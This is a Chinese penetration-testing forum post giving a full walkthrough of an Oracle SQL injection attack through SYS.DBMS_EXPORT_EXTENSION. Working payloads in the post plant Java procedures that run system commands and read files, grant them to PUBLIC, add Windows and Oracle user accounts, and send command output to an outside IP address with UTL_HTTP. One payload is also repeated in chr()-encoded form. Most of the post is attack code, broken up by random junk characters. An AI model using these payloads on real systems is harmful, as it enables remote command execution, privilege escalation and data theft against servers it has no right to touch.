中国网络渗透测试联盟

标题: 实例演示oracle注入获取cmdshell的全过程 [打印本页]

作者: admin    时间: 2012-12-18 12:21
标题: 实例演示oracle注入获取cmdshell的全过程
以下的演示都是在web上的sql plus执行的,在web注入时 把select SYS.DBMS_EXPORT_EXTENSION.....改成 2 Q( v$ f# u1 H: L
. v) @5 @4 X* k2 _1 |2 y6 h
  /xxx.jsp?id=1 and '1'<>'a'||(select SYS.DBMS_EXPORT_EXTENSION.....)
: C+ d) y8 X/ d1 o5 z2 I: @的形式即可。(用" 'a'|| "是为了让语句返回true值) , Z) A# e5 t# \# K/ d# b
语句有点长,可能要用post提交。 , K& u+ \* {5 \4 w, K
以下是各个步骤: : q0 i) P" o9 z4 U3 J# r! c; A: `9 W
1.创建包
0 `5 ^6 ]0 H& f+ ?" T6 v" ~通过注入 SYS.DBMS_EXPORT_EXTENSION 函数,在oracle上创建Java包LinxUtil,里面两个函数,runCMD用于执行系统命令,readFile用于读取文件:
+ X/ {7 e7 P* e* e8 ]$ h6 Q/xxx.jsp?id=1 and '1'<>'a'||(
8 g8 M& _' R; f4 `. G- c8 g, d; Q$ @select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''$ r. p5 D# H9 F, t- w8 A( I
create or replace and compile java source named "LinxUtil" as import java.io.*; public class LinxUtil extends Object {public static String runCMD(String args) {try{BufferedReader myReader= new BufferedReader(
" x2 i: b  }) ]. K) K4 k& @new InputStreamReader( Runtime.getRuntime().exec(args).getInputStream() ) ); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}public static String readFile(String filename){try{BufferedReader myReader= new BufferedReader(new FileReader(filename)); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}
  j+ v, A5 w  M0 U1 W2 E/ x* d7 T2 m7 O}'''';END;'';END;--','SYS',0,'1',0) from dual
% U0 Q; Q6 G9 q; q% s) / v; A" H9 S( N) H: l/ s
------------------------
4 C' s/ p  D! S6 r5 h9 u. y如果url有长度限制,可以把readFile()函数块去掉,即:
  N/ {) \  \% l) H& A' J/xxx.jsp?id=1 and '1'<>'a'||(
0 \, b. c9 r2 r" \. O  b: eselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
* d- e' C$ D! v/ s3 z3 w( xcreate or replace and compile java source named "LinxUtil" as import java.io.*; public class LinxUtil extends Object {public static String runCMD(String args) {try{BufferedReader myReader= new BufferedReader(
" r9 O" p: D( T; {+ _new InputStreamReader( Runtime.getRuntime().exec(args).getInputStream() ) ); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}" ~. _( o2 W3 b: d% Z8 u+ X  j
}'''';END;'';END;--','SYS',0,'1',0) from dual
/ ^9 R3 G* t' ^: y* W% y)
9 w2 e! {8 t- a同时把后面步骤 提到的 对readFile()的处理语句去掉。 , n$ i0 p; R# u& t: l% I6 Z+ n# |
------------------------------ " E0 ~  ^! A- d/ c! a; A) g9 k
2.赋Java权限
( V; K( y3 i5 e5 g$ N8 ~7 xselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''begin dbms_java.grant_permission( ''''''''PUBLIC'''''''', ''''''''SYS:java.io.FilePermission'''''''', ''''''''<<ALL FILES>>'''''''', ''''''''execute'''''''' );end;'''';END;'';END;--','SYS',0,'1',0) from dual5 R2 b* q: J  g
3.创建函数 , e1 H4 J  }: x* ]
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''9 s" W* A4 n# A& l( C0 ]: X$ T% L! P1 G5 e
create or replace function LinxRunCMD(p_cmd in varchar2)  return varchar2  as language java name ''''''''LinxUtil.runCMD(java.lang.String) return String'''''''';   '''';END;'';END;--','SYS',0,'1',0) from dual  V8 g0 H/ b0 B4 t$ Z5 R
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''' q7 R8 G% i0 Y
create or replace function LinxReadFile(filename in varchar2)  return varchar2  as language java name ''''''''LinxUtil.readFile(java.lang.String) return String'''''''';   '''';END;'';END;--','SYS',0,'1',0) from dual
( W& h; c  S7 h$ u4.赋public执行函数的权限
# v2 L# q: {2 p" zselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''grant all on LinxRunCMD to public'''';END;'';END;--','SYS',0,'1',0) from dual
) \( i" `3 y  I- k8 f% @/ v7 a# ]select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''grant all on LinxReadFile to public'''';END;'';END;--','SYS',0,'1',0) from dual' B5 M; i7 ^% s. r3 k' Z
5.测试上面的几步是否成功
6 H; S/ P- ~! L! C0 zand '1'<>'11'||(
' s6 U+ l4 _+ e1 @6 l. @% `select  OBJECT_ID from all_objects where  object_name ='LINXRUNCMD'
8 q9 f0 e5 Q9 v3 @  _)
1 v9 f; D, h4 @% s$ E3 m$ U  w. j; oand '1'<>(
/ I, ?$ L- @0 D* k1 Eselect  OBJECT_ID from all_objects where  object_name ='LINXREADFILE' 5 W# G7 l4 q7 R  A" q7 _: d
)
7 Q, u+ s: ^& j6 }6.执行命令: ' C+ u+ V: t1 Z) [: t" U
/xxx.jsp?id=1 and '1'<>(
5 a9 E3 f  O9 N. vselect  sys.LinxRunCMD('cmd /c net user linx /add') from dual 4 D9 e, v9 o0 n! [
. p& v' G9 O) m$ Q: p- f  t
) " I3 u# _. i8 Q5 Y$ P/ x
/xxx.jsp?id=1 and '1'<>( + y/ n( q. V: o' q9 r  F% E
select  sys.LinxReadFile('c:/boot.ini') from dual
/ T' {3 W, q* e1 o. M$ {& k, L4 `! ]
). @2 B0 x( W0 h
  
- q' _% ?6 b3 g3 ]+ z注意sys.LinxReadFile()返回的是varchar类型,不能用"and 1<>" 代替 "and '1'<>"。
" d6 d% ~2 p" m% |1 Y2 L2 F- I如果要查看运行结果可以用 union :
, ?/ D" c/ Q7 A0 `# S/xxx.jsp?id=1 union select  sys.LinxRunCMD('cmd /c net user linx /add') from dual
9 N, A! l$ t  c; j2 |' e* p0 P或者UTL_HTTP.request(: ( y9 I, l1 a. X, V$ z" h# [
/xxx.jsp?id=1 and '1'<>( ! w% n. k4 x* b; R  B5 o
SELECT UTL_HTTP.request('http://211.71.147.3/record.php?a=LinxRunCMD:'||REPLACE(REPLACE(sys.LinxRunCMD('cmd /c net user aaa /del'),' ','%20'),'\n','%0A')) FROM dual
. W* K' g2 E+ V)
4 z: E2 Z2 W' x. u7 g" V/xxx.jsp?id=1 and '1'<>( * z1 Z& a2 d$ s& O5 G
SELECT UTL_HTTP.request('http://211.71.147.3/record.php?a=LinxRunCMD:'||REPLACE(REPLACE(sys.LinxReadFile('c:/boot.ini'),' ','%20'),'\n','%0A')) FROM dual
5 Z/ V7 m" \' l9 a' ?0 M$ ~)
0 Y3 w* {* F" |注意:用UTL_HTTP.request时,要用 REPLACE() 把空格、换行符给替换掉,否则会无法提交http request。用utl_encode.base64_encode也可以。
4 i3 Z# O% ]2 g3 u+ ~( P-------------------- 9 {& ?8 v8 i9 v. E
6.内部变化
0 g( M# g  J& s9 k0 h通过以下命令可以查看all_objects表达改变:
0 w0 a9 [5 G0 q0 l' A9 ?* mselect  * from all_objects where  object_name like '%LINX%' or  object_name like '%Linx%'4 ]7 o/ a; j" Q; ~0 y: p8 U
7.删除我们创建的函数
& ~  L6 C: m) Z8 _0 B8 A- uselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''- t/ Z0 R. B; d  ~7 j% |
drop function LinxRunCMD  '''';END;'';END;--','SYS',0,'1',0) from dual ( f: b, Q; G% H1 P2 M9 E) M( D
==================================================== 6 [% A( L% @+ Z7 W0 G1 C4 H
全文结束。谨以此文赠与我的朋友。
; L- [3 _) {6 Z8 Ulinx
8 s$ |1 A% C( A124829445
! p6 _9 W: j+ ^2 q2008.1.12
& _% |$ p& B( {, K3 Vlinyujian@bjfu.edu.cn 7 h, U% A3 V& `1 R3 W
======================================================================
0 C. Q/ Q5 C* C  k/ s测试漏洞的另一方法: 4 z( Z8 ?( e! d$ x$ b
创建oracle帐号:
/ `+ }: s% h/ B" u: C" F9 Xselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE '''') F+ L' b, F, U( H6 p  N. G
CREATE USER linxsql IDENTIFIED BY linxsql'''';END;'';END;--','SYS',0,'1',0) from dual
. v9 z) S/ L9 A4 ~即: ) N& ?! B" R5 k- |7 l$ r  ]: I
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES(chr(70)||chr(79)||chr(79),chr(66)||chr(65)||chr(82),
1 ?5 p3 g, E* p  x0 C! z7 v/ |3 nchr(68)||chr(66)||chr(77)||chr(83)||chr(95)||chr(79)||chr(85)||chr(84)||chr(80)||chr(85)||chr(84)||chr(34)||chr(46)||chr(80)||chr(85)||chr(84)||chr(40)||chr(58)||chr(80)||chr(49)||chr(41)||chr(59)||chr(69)||chr(88)||chr(69)||chr(67)||chr(85)||chr(84)||chr(69)||chr(32)||chr(73)||chr(77)||chr(77)||chr(69)||chr(68)||chr(73)||chr(65)||chr(84)||chr(69)||chr(32)||chr(39)||chr(68)||chr(69)||chr(67)||chr(76)||chr(65)||chr(82)||chr(69)||chr(32)||chr(80)||chr(82)||chr(65)||chr(71)||chr(77)||chr(65)||chr(32)||chr(65)||chr(85)||chr(84)||chr(79)||chr(78)||chr(79)||chr(77)||chr(79)||chr(85)||chr(83)||chr(95)||chr(84)||chr(82)||chr(65)||chr(78)||chr(83)||chr(65)||chr(67)||chr(84)||chr(73)||chr(79)||chr(78)||chr(59)||chr(66)||chr(69)||chr(71)||chr(73)||chr(78)||chr(32)||chr(69)||chr(88)||chr(69)||chr(67)||chr(85)||chr(84)||chr(69)||chr(32)||chr(73)||chr(77)||chr(77)||chr(69)||chr(68)||chr(73)||chr(65)||chr(84)||chr(69)||chr(32)||chr(39)||chr(39)||chr(67)||chr(82)||chr(69)||chr(65)||chr(84)||chr(69)||chr(32)||chr(85)||chr(83)||chr(69)||chr(82)||chr(32)||chr(108)||chr(105)||chr(110)||chr(120)||chr(115)||chr(113)||chr(108)||chr(32)||chr(73)||chr(68)||chr(69)||chr(78)||chr(84)||chr(73)||chr(70)||chr(73)||chr(69)||chr(68)||chr(32)||chr(66)||chr(89)||chr(32)||chr(108)||chr(105)||chr(110)||chr(120)||chr(115)||chr(113)||chr(108)||chr(39)||chr(39)||chr(59)||chr(69)||chr(78)||chr(68)||chr(59)||chr(39)||chr(59)||chr(69)||chr(78)||chr(68)||chr(59)||chr(45)||chr(45),chr(83)||chr(89)||chr(83),0,chr(49),0) from dual * }! K+ y' L$ \+ K
确定漏洞存在:
9 j2 h+ A1 h3 P8 H: o1<>(
( p$ a+ Q2 R& nselect user_id from all_users where username='LINXSQL'
2 b% A: f5 W+ }8 p4 G0 a, W$ Z) 7 X8 M( _  F1 ~
给linxsql连接权限: ) @- N  s1 b, f/ f
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
4 ~- p! l7 u3 A2 zGRANT CONNECT TO linxsql'''';END;'';END;--','SYS',0,'1',0) from dual
1 u9 ^$ {2 |- s/ h删除帐号:
1 r2 W- n; g5 |1 A7 lselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''2 C( L7 R- Z2 b
drop user LINXSQL'''';END;'';END;--','SYS',0,'1',0) from dual
/ ~# w* F/ e. @1 s/ ~3 ^" W4 x- @======================
7 B$ T) _, V, ]以下方法创建一个可以执行多语句的函数Linx_query(),执行成功的话返回数值"1",但权限是继承的,可能仅仅是public权限,作用似乎不大,真的要用到话可以考虑grant dba to 当前的User:
& A5 t( V+ j3 E2 U* {1.jsp?id=1 and '1'<>(
. |. a1 w9 I( L% R* z% i$ G0 M! S! iselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
" n2 L2 U4 K* ]* w! `; Y8 S9 Zcreate or replace function Linx_query (p varchar2) return number authid current_user is begin execute immediate p; return 1;  end;   '''';END;'';END;--','SYS',0,'1',0) from dual1 M* B4 C5 n+ D) K
) and ... 1.jsp?id=1 and '1'( select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT.PUT(:P1);EXECUTE IMMEDIATE
0 Q; U1 T, T1 }8 K )
8 z: O5 ~% v, w5 t# u% v' Q$ R9 w, C* ]$ w; I- i
* ^) L9 l; F; j* o/ P

: L+ e8 `; J; S




欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2